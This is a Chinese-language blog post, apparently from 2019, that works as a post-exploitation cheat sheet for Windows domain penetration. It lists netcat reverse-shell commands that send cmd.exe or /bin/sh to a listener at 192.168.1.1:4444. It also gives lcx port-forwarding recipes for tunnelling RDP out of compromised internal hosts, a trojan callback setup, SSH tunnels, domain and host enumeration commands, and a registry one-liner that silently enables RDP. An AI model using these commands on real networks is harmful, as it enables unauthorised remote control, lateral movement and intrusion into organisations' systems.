后渗透之内网信息收集

内网域渗透的先决条件


首先你要能拿下一台域内的机器,然后才能开始域渗透。道理很简单,就不啰嗦了。介绍一些windows反弹shell的方法:

.\nc.exe -e cmd.exe 192.168.1.1 4444
.\nc 192.168.1.1 4444 -e /bin/sh 
nc -l 4444 -vvv

内网穿外网


方案一 正想开口等连接  
.\lcx.exe -slave 192.168.10.100 4444 192.168.20.201 3389 #192.168.20.201为内网肉机,192.168.10.100是边界肉机
.\lcx.exe -listen 4444 8888 #在边界肉机上
mstsc 192.168.10.100 8888 #在攻击者主机上
方案二 返向直接连回去  
木马会连地址20.20.20.10 #在内网肉机配置木马,反连20.20.20.10是边界肉机,上线端口8888
.\lcx.exe -listen 4444 8888 #在边界肉机上
.\lcx.exe -slave 20.20.20.10 4444 127.0.0.1 4444 #在攻击者主机上
关于ssh端口转发
ssh -C -f -N -g -L 55555:127.0.0.1:8080 a003797@127.0.0.1 #本地端口(55555)到目标地址(127.0.0.1)的目标端口(8080),后面是必须ssh到对方应该是对段的username@IP地址
ssh -C -f -N -g -R 55555:127.0.0.1:8080 a003797@127.0.0.1 #目标地址(127.0.0.1)的目标端口(8080)到本地端口(55555),后面是必须ssh到对方应该是对段的username@IP地址
ssh -C -f -N -g -D listen_port user@Tunnel_Host #不常用,动态监测
最后配置ssr代理
不详细介绍  

域渗透的信息收集


查询本机信息

    C:\Windows\system32>fsutil.exe fsinfo drives #查询盘符信息
    C:\Windows\system32>systeminfo #查询系统信息
    C:\Windows\system32>ipconfig /all #查询网络信息

查询域信息

    C:\Windows\system32>net view /domain#查询域
    C:\Windows\system32>net group /domain #查询组
    C:\Windows\system32>net user /domain #查询域用户
    C:\Windows\system32>net group “domain admins” /domain #查询域管信息
    C:\Windows\system32>net group "domain computer" /domain #查询域内机器信息

查看网络、服务、进程信息

    C:\Windows\system32>netstat -anb -p tcp#查询网络服务及PID
    C:\Windows\system32>tasklist #查看进程信息
    C:\Windows\system32>taskkill /f /im process-name #杀掉进程

一键开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
posted @ 2019-07-11 22:20  北纬星辰-  阅读(716)  评论(0编辑  收藏  举报